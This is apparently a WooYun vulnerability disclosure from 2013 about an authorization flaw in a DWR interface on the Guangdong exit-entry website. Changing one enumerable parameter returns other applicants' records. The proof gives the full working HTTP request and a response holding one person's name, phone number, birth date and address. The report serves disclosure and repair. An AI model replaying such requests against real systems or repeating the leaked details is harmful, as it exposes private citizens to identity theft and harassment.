当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-020589

漏洞标题:广东出入境网站某接口泄露用户信息

相关厂商:广东出入境

漏洞作者: fbi007130

提交时间:2013-03-24 22:50

修复时间:2013-05-08 22:51

公开时间:2013-05-08 22:51

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(广东省信息安全测评中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-03-24: 细节已通知厂商并且等待厂商处理中
2013-03-25: 厂商已经确认,细节仅向厂商公开
2013-04-04: 细节向核心白帽子及相关领域专家公开
2013-04-14: 细节向普通白帽子公开
2013-04-24: 细节向实习白帽子公开
2013-05-08: 细节向公众公开

简要描述:

使用某业务的时候多手去用fiddler看了一下包,竟然发现仅凭着一个可以推导的要素就可以获取到公民姓名、出生年月以及证件相关信息
广东的孩子也kb,2个月才能签一次澳门签注(顺带说说,不是bug)
另外,乌云的编辑窗口,在chrome里边不能拉大。。。。

详细说明:

调用接口,修改c0-param0即可获取用户资料

漏洞证明:

request:
POST http://gdcrj.com/wsyw/dwr/call/plaincall/ApplyLookup.findOldApply.dwr HTTP/1.1
Host: gdcrj.com
Connection: keep-alive
Content-Length: 286
Origin: http://gdcrj.com
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.56 Safari/537.17
Content-Type: text/plain
Accept: */*
Referer: http://gdcrj.com/wsyw/tbpassportapply/tbpassportapply.do?method=grly
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=ECD92A89A0664E72071AA427916BB7A4
callCount=1
page=/wsyw/tbpassportapply/tbpassportapply.do?method=grly
httpSessionId=ECD92A89A0664E72071AA427916BB7A4
scriptSessionId=72C84F2F080B22B562A7B5981EFCCD6868
c0-scriptName=ApplyLookup
c0-methodName=findOldApply
c0-id=0
c0-param0=string:W28615021
c0-param1=string:08
batchId=0
response:
HTTP/1.1 200 OK
Date: Sun, 24 Mar 2013 12:27:39 GMT
Server: Apache-Coyote/1.1
Content-Type: text/javascript
Content-Length: 290
Connection: Keep-alive
Keep-Alive: timeout=15, max=100
Via: 1.1 ID-0002262016313030 uproxy-2
//#DWR-INSERT
//#DWR-REPLY
dwr.engine._remoteHandleCallback('0','0',{'XM_X':"\u6C64",GZDW:"\u65E0",DWDH:"13630035576",emssjr:"\u6C64\u5FD7\u948A",ZJYXQZ:"2013-11-23",emsaddr:"\u5357\u6D77 \u91CC\u6C34(13630035576)",applyflag:"1",'XM_M':"\u5FD7\u948A",emsyb:"528200",CSRQ:"1986-10-01"});

修复方案:

用那么贵的签注费去补补服务器吧。。。。别把敏感信息在前端检校了。。。。

版权声明:转载请注明来源 fbi007130@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:3

确认时间:2013-03-25 10:10

厂商回复:

经检测,DWR应用中权限设置有问题,用户在办理证件速递业务时,抓取到DWR调用接口后,能够获得其他用户的一些信息。

最新状态:

暂无